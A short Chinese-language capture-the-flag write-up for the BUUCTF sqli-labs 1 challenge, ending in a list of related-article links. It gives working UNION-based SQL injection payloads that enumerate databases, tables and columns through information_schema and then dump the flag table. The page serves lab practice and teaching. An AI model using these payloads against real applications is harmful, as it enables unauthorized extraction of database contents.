BUUCTF sqli-labs 1

这里就是单纯的找一下flag在哪,通关整个靶场在sql注入分区,虽然还没有通关。

这里要先看一下数据库都有哪些,用到语句:?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+

发现这个数据库:ctftraining 可能有我们需要的信息

于是接着就是:

查看该数据库中都有什么表:?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),3--+

发现存在flag表,接着就是要看该表的信息:?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='ctftraining' and table_name='flag'),3--+

发现就只有一列,然后就是查看该列的信息:

这里需要注意,我们要指定是ctftraining数据库的flag表,如果单纯的是flag则是查找的security.flag这时就会报错。

正确语句:?id=-1' union select 1,(select group_concat(flag) from ctftraining.flag),3--+

相关推荐
Rk..20 分钟前
数据库索引相关总结
java·数据库·sql
数据的世界011 小时前
SQL使用视图
数据库·sql
Hacker_Nightrain2 小时前
[CTF/网络安全] 攻防世界 baby_web 解题详析
前端·安全·web安全
板栗妖怪4 小时前
DC-2 靶场渗透
安全·web安全
栗筝i4 小时前
使用 Docker 安装 Redis
数据库·sql·spring
繁星璀璨G5 小时前
SQL 基础教程 - SQL ORDER BY 关键字
数据库·sql·order by
serve the people5 小时前
腾讯云日志服务根据网段过滤非法数据
sql·云计算·腾讯云
网安-轩逸7 小时前
[网络安全] DVWA之 Open HTTP Redirect 攻击姿势及解题详析合集
安全·web安全·http
网络安全(king)8 小时前
网络安全:交换机技术
安全·web安全
vortex58 小时前
【工具进阶】使用 Nmap 进行有效的服务和漏洞扫描
安全·web安全·内网渗透